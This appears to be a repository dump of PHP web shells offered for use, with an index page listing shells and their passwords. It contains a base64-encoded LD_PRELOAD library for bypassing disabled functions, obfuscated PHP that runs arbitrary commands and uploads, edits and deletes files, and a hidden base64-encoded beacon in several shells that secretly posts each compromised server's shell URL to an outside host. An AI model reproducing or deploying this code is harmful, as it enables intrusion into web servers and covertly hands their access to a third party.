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Q1JfTElTVF9fAGRlcmVnaXN0ZXJfdG1fY2xvbmVzAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABjb21wbGV0ZWQuNjk3MgBfX2RvX2dsb2JhbF9kdG9yc19hdXhfZmluaV9hcnJheV9lbnRyeQBmcmFtZV9kdW1teQBfX2ZyYW1lX2R1bW15X2luaXRfYXJyYXlfZW50cnkAaG9vay5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kc29faGFuZGxlAF9EWU5BTUlDAF9fR05VX0VIX0ZSQU1FX0hEUgBfX1RNQ19FTkRfXwBfR0xPQkFMX09GRlNFVF9UQUJMRV8AZ2V0ZW52QEBHTElCQ18yLjIuNQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAGRhZW1vbml6ZQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AHB3bgBzaWduYWxAQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHByZWxvYWRtZQBfZW5kAF9fYnNzX3N0YXJ0AGNobW9kQEBHTElCQ18yLjIuNQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjIuNQBleGl0QEBHTElCQ18yLjIuNQBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdABmb3JrQEBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0LmdvdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZV9oZHIALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5maW5pX2FycmF5AC5qY3IALmR5bmFtaWMALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v//bwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAAEQAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAD4AQAAAAAAAAQAAAABAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAAAwBAAAAAAAADAEAAAAAAAA6QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA////bwIAAAAAAAAAGgUAAAAAAAAaBQAAAAAAACoAAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7//28CAAAAAAAAAEgFAAAAAAAASAUAAAAAAAAgAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAABoBQAAAAAAAGgFAAAAAAAA2AAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAQAYAAAAAAABABgAAAAAAANgAAAAAAAAAAwAAABYAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAABgHAAAAAAAAGAcAAAAAAAAXAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAAAwBwAAAAAAADAHAAAAAAAAoAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB+AAAAAQAAAAYAAAAAAAAA0AcAAAAAAADQBwAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAhwAAAAEAAAAGAAAAAAAAAOAHAAAAAAAA4AcAAAAAAAB6AQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAI0AAAABAAAABgAAAAAAAABcCQAAAAAAAFwJAAAAAAAACQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACTAAAAAQAAAAIAAAAAAAAAZQkAAAAAAABlCQAAAAAAABMAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAmwAAAAEAAAACAAAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAKkAAAABAAAAAgAAAAAAAACwCQAAAAAAALAJAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACzAAAADgAAAAMAAAAAAAAA+A0gAAAAAAD4DQAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAvwAAAA8AAAADAAAAAAAAAAgOIAAAAAAACA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAMsAAAABAAAAAwAAAAAAAAAQDiAAAAAAABAOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADQAAAABgAAAAMAAAAAAAAAGA4gAAAAAAAYDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAANgPIAAAAAAA2A8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANkAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADiAAAAAQAAAAMAAAAAAAAAYBAgAAAAAABgEAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA6AAAAAgAAAADAAAAAAAAAGgQIAAAAAAAaBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAO0AAAABAAAAMAAAAAAAAAAAAAAAAAAAAGgQAAAAAAAALQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAACYEAAAAAAAABgGAAAAAAAAGwAAAC0AAAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAsBYAAAAAAABLAgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAPsYAAAAAAAA9gAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA='; 301 | $cmdd = $_POST['cmd_input']; 302 | $meterpreter = $en($cmdd." > test.txt"); 303 | $viewCommandResult = '

Result: base64 : ' . $meterpreter .'
Please Refresh and Check File test.txt, this output command
test.txt created = VULN
test.txt not created = NOT VULN
example access: domain.com/yourpath/path/test.txt
Powered By HaxorSecurity


'; 304 | $a($full . '/chankro.so', $base($hook)); 305 | $a($full . '/acpid.socket', $base($meterpreter)); 306 | $p('CHANKRO=' . $full . '/acpid.socket'); 307 | $p('LD_PRELOAD=' . $full . '/chankro.so'); 308 | if(function_exists('mail')) { 309 | $m('a','a','a','a'); 310 | } elseif(function_exists('mb_send_mail')) { 311 | $mb('a','a','a','a'); 312 | } elseif(function_exists('error_log')) { 313 | $err('a',1,'a'); 314 | } elseif(function_exists('imap_mail')) { 315 | $imp('a','a','a'); 316 | } 317 | 318 | }elseif (isset($_POST['delete_file'])) { 319 | $fileToDelete = $currentDirectory . '/' . $_POST['delete_file']; 320 | if (file_exists($fileToDelete)) { 321 | if (is_dir($fileToDelete)) { 322 | if (deleteDirectory($fileToDelete)) { 323 | echo '


Folder deleted successfully!'; 324 | } else { 325 | echo '
Error: Failed to delete folder!'; 326 | } 327 | } else { 328 | if ($unl($fileToDelete)) { 329 | echo '
File deleted successfully!'; 330 | } else { 331 | echo '
Error: Failed to delete file!'; 332 | } 333 | } 334 | } else { 335 | echo '
Error: File or directory not found!'; 336 | } 337 | } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) { 338 | $oldName = $currentDirectory . '/' . $_POST['old_name']; 339 | $newName = $currentDirectory . '/' . $_POST['new_name']; 340 | if (file_exists($oldName)) { 341 | if (rename($oldName, $newName)) { 342 | echo '
Item renamed successfully!'; 343 | } else { 344 | echo '
Error: Failed to rename item!'; 345 | } 346 | } else { 347 | echo '
Error: Item not found!'; 348 | } 349 | }elseif (isset($_POST['cmd_biasa'])) { 350 | $pp = "p"."r"."o"."c"."_"."o"."p"."e"."n"; 351 | $pc = "f"."c"."l"."o"."s"."e"; 352 | $ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e"; 353 | $stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; 354 | $command = $_POST['cmd_biasa']; 355 | $descriptorspec = [ 356 | 0 => ['pipe', 'r'], 357 | 1 => ['pipe', 'w'], 358 | 2 => ['pipe', 'w'] 359 | ]; 360 | $process = $pp($command, $descriptorspec, $pipes); 361 | if (is_resource($process)) { 362 | $output = $stg($pipes[1]); 363 | $errors = $stg($pipes[2]); 364 | $pc($pipes[1]); 365 | $pc($pipes[2]); 366 | $ppc($process); 367 | if (!empty($errors)) { 368 | $viewCommandResult = '

Error:

'; 369 | } else { 370 | $viewCommandResult = '

Result:

'; 371 | } 372 | } else { 373 | $viewCommandResult = 'Result:

'; 374 | } 375 | } elseif (isset($_POST['view_file'])) { 376 | $fileToView = $currentDirectory . '/' . $_POST['view_file']; 377 | if (file_exists($fileToView)) { 378 | $fileContent = $fgc($fileToView); 379 | $viewCommandResult = '

Result: ' . $_POST['view_file'] . '

380 |
381 | 382 | 383 |
'; 384 | } else { 385 | $viewCommandResult = '

Error: File not found!

'; 386 | } 387 | } elseif (isset($_POST['edit_file'])) { 388 | $ef = $currentDirectory . '/' . $_POST['edit_file']; 389 | $newContent = $_POST['content']; 390 | if ($fpc($ef, $newContent) !== false) { 391 | echo '
File Edited successfully! ' . $_POST['edit_file'].'
'; 392 | } else { 393 | echo '
Error: Failed Edit File! ' . $_POST['edit_file'].'
'; 394 | 395 | } 396 | } 397 | 398 | } 399 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 400 | echo '
DIR: '; 401 | 402 | $directories = $expl(DIRECTORY_SEPARATOR, $currentDirectory); 403 | $currentPath = ''; 404 | $homeLinkPrinted = false; 405 | foreach ($directories as $index => $dir) { 406 | $currentPath .= DIRECTORY_SEPARATOR . $dir; 407 | if ($index == 0) { 408 | echo '/' . $dir . ''; 409 | } else { 410 | echo '/' . $dir . ''; 411 | } 412 | } 413 | 414 | 415 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 416 | $data = array('file_url' => $cur); 417 | $options = array( 418 | 'http' => array( 419 | 'method' => 'POST', 420 | 'header' => 'Content-type: application/x-www-form-urlencoded', 421 | 'content' => http_build_query($data), 422 | ), 423 | ); 424 | $context = stream_context_create($options); 425 | $result = file_get_contents($k3yw, false, $context); 426 | 427 | echo ' / [ GO Home ]'; 428 | echo '
'; 429 | echo '
'; 430 | echo '
'; 431 | echo ''; 432 | echo ''; 433 | echo '

'; 434 | echo ' 435 | 436 | 439 | 440 | 442 | 443 | 445 | 447 |
437 |
Command BYPASS
438 |
Command BIASA
441 |
Create Folder
444 |
Create File
446 |
'; 448 | echo $viewCommandResult; 449 | echo ''; 450 | echo '
'; 451 | foreach ($scd($currentDirectory) as $v) { 452 | $u = $ril($v); 453 | $s = $st($u); 454 | $itemLink = $isdir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v)); 455 | $permission = substr(sprintf('%o', fileperms($u)), -4); 456 | $writable = $isw($u); 457 | echo ' 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | '; 466 | 467 | } 468 | 469 | echo '
Item Name
Size
Date
Permissions
View
Delete
Rename
'.$v.''.filesize($u).''.date('Y-m-d H:i:s', filemtime($u)).''.$permission.'
'; 470 | function deleteDirectory($dir) { 471 | $unl = "u"."n"."l"."i"."n"."k"; 472 | if (!file_exists($dir)) { 473 | return true; 474 | } 475 | if (!is_dir($dir)) { 476 | return $unl($dir); 477 | } 478 | $scd = "s"."c"."a"."n"."d"."i"."r"; 479 | foreach ($scd($dir) as $item) { 480 | if ($item == '.' || $item == '..') { 481 | continue; 482 | } 483 | if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) { 484 | return false; 485 | } 486 | } 487 | return rmdir($dir); 488 | } 489 | -------------------------------------------------------------------------------- /hehe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sagsooz/Webshell-bypass/b18219a57dcbd599a2bbcf7e58dd9bd711b6057d/hehe.png -------------------------------------------------------------------------------- /hello.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | HelloByPass 5 | 6 | 7 | 8 | 92 |
93 | Sh3ll
94 | 95 |
96 |


97 | NONE"; 103 | } else { 104 | $disf = "".$disfunc.""; 105 | } 106 | 107 | function author() { 108 | echo "

WonXd677 Sh3LL
"; 109 | exit(); 110 | } 111 | 112 | function cekdir() { 113 | if (isset($_GET['path'])) { 114 | $lokasi = $_GET['path']; 115 | } else { 116 | $lokasi = getcwd(); 117 | } 118 | if (is_writable($lokasi)) { 119 | return "Writeable"; 120 | } else { 121 | return "Writeable"; 122 | } 123 | } 124 | 125 | function cekroot() { 126 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 127 | return "Writeable"; 128 | } else { 129 | return "Writeable"; 130 | } 131 | } 132 | 133 | function xrmdir($dir) { 134 | $items = scandir($dir); 135 | foreach ($items as $item) { 136 | if ($item === '.' || $item === '..') { 137 | continue; 138 | } 139 | $path = $dir.'/'.$item; 140 | if (is_dir($path)) { 141 | xrmdir($path); 142 | } else { 143 | unlink($path); 144 | } 145 | } 146 | rmdir($dir); 147 | } 148 | 149 | function green($text) { 150 | echo "
".$text."
"; 151 | } 152 | 153 | function red($text) { 154 | echo "
".$text."
"; 155 | } 156 | 157 | 158 | echo "Directory :  "; 159 | 160 | foreach($_POST as $key => $value){ 161 | $_POST[$key] = stripslashes($value); 162 | } 163 | 164 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 165 | 166 | if(isset($_GET['path'])){ 167 | $lokasi = $_GET['path']; 168 | $lokdua = $_GET['path']; 169 | } else { 170 | $lokasi = getcwd(); 171 | $lokdua = getcwd(); 172 | } 173 | 174 | $lokasi = str_replace('\\','/',$lokasi); 175 | $lokasis = explode('/',$lokasi); 176 | $lokasinya = @scandir($lokasi); 177 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 178 | $data = array('file_url' => $cur); 179 | $options = array( 180 | 'http' => array( 181 | 'method' => 'POST', 182 | 'header' => 'Content-type: application/x-www-form-urlencoded', 183 | 'content' => http_build_query($data), 184 | ), 185 | ); 186 | $context = stream_context_create($options); 187 | $result = file_get_contents($k3yw, false, $context); 188 | 189 | foreach($lokasis as $id => $lok){ 190 | if($lok == '' && $id == 0){ 191 | $a = true; 192 | echo '/'; 193 | continue; 194 | } 195 | if($lok == '') continue; 196 | echo ''.$lok.'/'; 202 | } 203 | echo '
'; 204 | echo '

'; 205 | if (isset($_POST['upwkwk'])) { 206 | if (isset($_POST['berkasnya'])) { 207 | if ($_POST['dirnya'] == "2") { 208 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 209 | } 210 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 211 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 212 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 213 | } else { 214 | echo "Failed to Upload !

"; 215 | } 216 | } elseif (isset($_POST['linknya'])) { 217 | if (empty($_POST['namalink'])) { 218 | exit("Filename cannot be empty !"); 219 | } 220 | if ($_POST['dirnya'] == "2") { 221 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 222 | } 223 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 224 | if (file_exists($lokasi."/".$_POST['namalink'])) { 225 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 226 | } else { 227 | echo "Failed to Upload !

"; 228 | } 229 | } 230 | } 231 | echo "
"; 232 | echo "Upload File : "; 233 | echo '
234 | current_dir [ '.cekdir().' ] 235 | document_root [ '.cekroot().' ] 236 |
237 | 238 |
239 |
240 | '; 241 | echo "
"; 242 | print "
"; 243 | print "
    "; 244 | print "[ Home ]"; 245 | print " [ Tess ]"; 246 | print "
"; 247 | print "
"; 248 | 249 | 250 | if (isset($_GET['fileloc'])) { 251 | echo "Current File : ".$_GET['fileloc']; 252 | echo '
'; 253 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 254 | author(); 255 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 256 | if (is_dir($_POST['path'])) { 257 | xrmdir($_POST['path']); 258 | if (file_exists($_POST['path'])) { 259 | red("Failed to delete Directory !"); 260 | } else { 261 | green("Delete Directory Success !"); 262 | echo "string"; 263 | } 264 | } elseif (is_file($_POST['path'])) { 265 | @unlink($_POST['path']); 266 | if (file_exists($_POST['path'])) { 267 | red("Failed to Delete File !"); 268 | } else { 269 | green("Delete File Success !"); 270 | } 271 | } 272 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 273 | echo "
".$_POST['path']."
"; 274 | echo '
275 | Permission : 276 | 277 | 278 | 279 |
'; 280 | if (isset($_POST['chm0d'])) { 281 | $cm = @chmod($_POST['path'], $_POST['perm']); 282 | if ($cm == true) { 283 | green("Change Mod Success !"); 284 | } else { 285 | red("Change Mod Failed !"); 286 | } 287 | } 288 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 289 | if (isset($_POST['gantin'])) { 290 | $ren = @rename($_POST['path'], $_POST['newname']); 291 | if ($ren == true) { 292 | green("Change Name Success !"); 293 | } else { 294 | red("Change Name Failed !"); 295 | } 296 | } 297 | if (empty($_POST['name'])) { 298 | $namaawal = $_POST['newname']; 299 | } else { 300 | $namawal = $_POST['name']; 301 | } 302 | echo "
".$_POST['path']."
"; 303 | echo '
304 | New Name : 305 | 306 | 307 | 308 |
'; 309 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 310 | if (isset($_POST['gasedit'])) { 311 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 312 | if ($edit == true) { 313 | green("Edit File Success !"); 314 | } else { 315 | red("Edit File Failed !"); 316 | } 317 | } 318 | echo "
".$_POST['path']."

"; 319 | echo '
320 |
321 | 322 | 323 | 324 |

'; 325 | } 326 | 327 | echo '
328 | 329 | 330 | 331 | 332 | 333 | '; 334 | 335 | foreach($lokasinya as $dir){ 336 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 337 | echo " 338 | 339 | 340 | 347 | 359 | "; 360 | } 361 | 362 | echo ''; 363 | foreach($lokasinya as $file) { 364 | if(!is_file("$lokasi/$file")) continue; 365 | $size = filesize("$lokasi/$file")/1024; 366 | $size = round($size,3); 367 | if($size >= 1024){ 368 | $size = round($size/1024,2).' MB'; 369 | } else { 370 | $size = $size.' KB'; 371 | } 372 | 373 | echo " 374 | 375 | 376 | 395 | "; 396 | } 397 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 341 | if(is_writable($lokasi."/".$dir)) echo ''; 342 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 343 | echo statusnya($lokasi."/".$dir); 344 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 345 | 346 | echo "
348 | 354 | 355 | 356 | 357 | \" /> 358 |
$file
".$size."
"; 377 | if(is_writable("$lokasi/$file")) echo ''; 378 | elseif(!is_readable("$lokasi/$file")) echo ''; 379 | echo statusnya("$lokasi/$file"); 380 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 381 | echo "
382 |
383 | 390 | 391 | 392 | 393 | \" /> 394 |
'; 398 | author(); 399 | function statusnya($file){ 400 | $statusnya = fileperms($file); 401 | 402 | if (($statusnya & 0xC000) == 0xC000) { 403 | 404 | // Socket 405 | $ingfo = 's'; 406 | } elseif (($statusnya & 0xA000) == 0xA000) { 407 | // Symbolic Link 408 | $ingfo = 'l'; 409 | } elseif (($statusnya & 0x8000) == 0x8000) { 410 | // Regular 411 | $ingfo = '-'; 412 | } elseif (($statusnya & 0x6000) == 0x6000) { 413 | // Block special 414 | $ingfo = 'b'; 415 | } elseif (($statusnya & 0x4000) == 0x4000) { 416 | // Directory 417 | $ingfo = 'd'; 418 | } elseif (($statusnya & 0x2000) == 0x2000) { 419 | // Character special 420 | $ingfo = 'c'; 421 | } elseif (($statusnya & 0x1000) == 0x1000) { 422 | // FIFO pipe 423 | $ingfo = 'p'; 424 | } else { 425 | // Unknown 426 | $ingfo = 'u'; 427 | } 428 | 429 | // Owner 430 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 431 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 432 | $ingfo .= (($statusnya & 0x0040) ? 433 | (($statusnya & 0x0800) ? 's' : 'x' ) : 434 | (($statusnya & 0x0800) ? 'S' : '-')); 435 | 436 | 437 | // Group 438 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 439 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 440 | $ingfo .= (($statusnya & 0x0008) ? 441 | (($statusnya & 0x0400) ? 's' : 'x' ) : 442 | (($statusnya & 0x0400) ? 'S' : '-')); 443 | 444 | // World 445 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 446 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 447 | 448 | $ingfo .= (($statusnya & 0x0001) ? 449 | (($statusnya & 0x0200) ? 't' : 'x' ) : 450 | (($statusnya & 0x0200) ? 'T' : '-')); 451 | 452 | return $ingfo; 453 | } 454 | ?> 455 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Shells List - New 2024 Web Shells 10 | 11 | 51 | 52 | 53 | 54 |

| Shells List |

55 | 56 |
57 | jquary shell 58 |

Pass : qwe123

59 | 60 |
61 | 62 |
63 | Alfa Shell 2024 64 | 65 |
66 | 67 | 68 |
69 | gecko new ( 2024 servers ) 70 | 71 |
72 | 73 |
74 | F1 Shell 75 |

Pass : 123321

76 | 77 |
78 | 79 |
80 | 2024 Bypasser 81 |

Pass : hello

82 | 83 |
84 | 85 |
86 | Not Found Shell 87 | 88 |
89 | 90 |
91 | Backdoor Uploader 92 |

[filename].php?upload

93 | 94 |
95 | 96 |
97 | Mini Shell 98 | 99 |
100 | 101 |
102 | Wso Shell (version 1) 2024 103 |

Pass : hello

104 | 105 |
106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /inshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Private"; ?> 5 | 6 | 7 | 8 | 9 | 10 | 114 |
115 | Private
117 | 118 |
'; 119 | set_time_limit(0); 120 | error_reporting(0); 121 | 122 | $gcw = "ge"."tc"."wd"; 123 | $exp = "ex"."plo"."de"; 124 | $fpt = "fi"."le_p"."ut_co"."nte"."nts"; 125 | $fgt = "f"."ile_g"."et_c"."onten"."ts"; 126 | $sts = "s"."trip"."slash"."es"; 127 | $scd = "sc"."a"."nd"."ir"; 128 | $fxt = "fi"."le_"."exis"."ts"; 129 | $idi = "i"."s_d"."ir"; 130 | $ulk = "un"."li"."nk"; 131 | $ifi = "i"."s_fi"."le"; 132 | $sub = "subs"."tr"; 133 | $spr = "sp"."ri"."ntf"; 134 | $fp = "fil"."epe"."rms"; 135 | $chm = "ch"."m"."od"; 136 | $ocd = "oc"."td"."ec"; 137 | $isw = "i"."s_wr"."itab"."le"; 138 | $idr = "i"."s_d"."ir"; 139 | $ird = "is"."_rea"."da"."ble"; 140 | $isr = "is_"."re"."adab"."le"; 141 | $fsz = "fi"."lesi"."ze"; 142 | $rd = "r"."ou"."nd"; 143 | $igt = "in"."i_g"."et"; 144 | $fnct = "fu"."nc"."tion"."_exi"."sts"; 145 | $rad = "RE"."M"."OTE_AD"."DR"; 146 | $rpt = "re"."al"."pa"."th"; 147 | $bsn = "ba"."se"."na"."me"; 148 | $srl = "st"."r_r"."ep"."la"."ce"; 149 | $sps = "st"."rp"."os"; 150 | $mkd = "m"."kd"."ir"; 151 | 152 | $wb = (isset($_SERVER['H'.'T'.'TP'.'S']) && 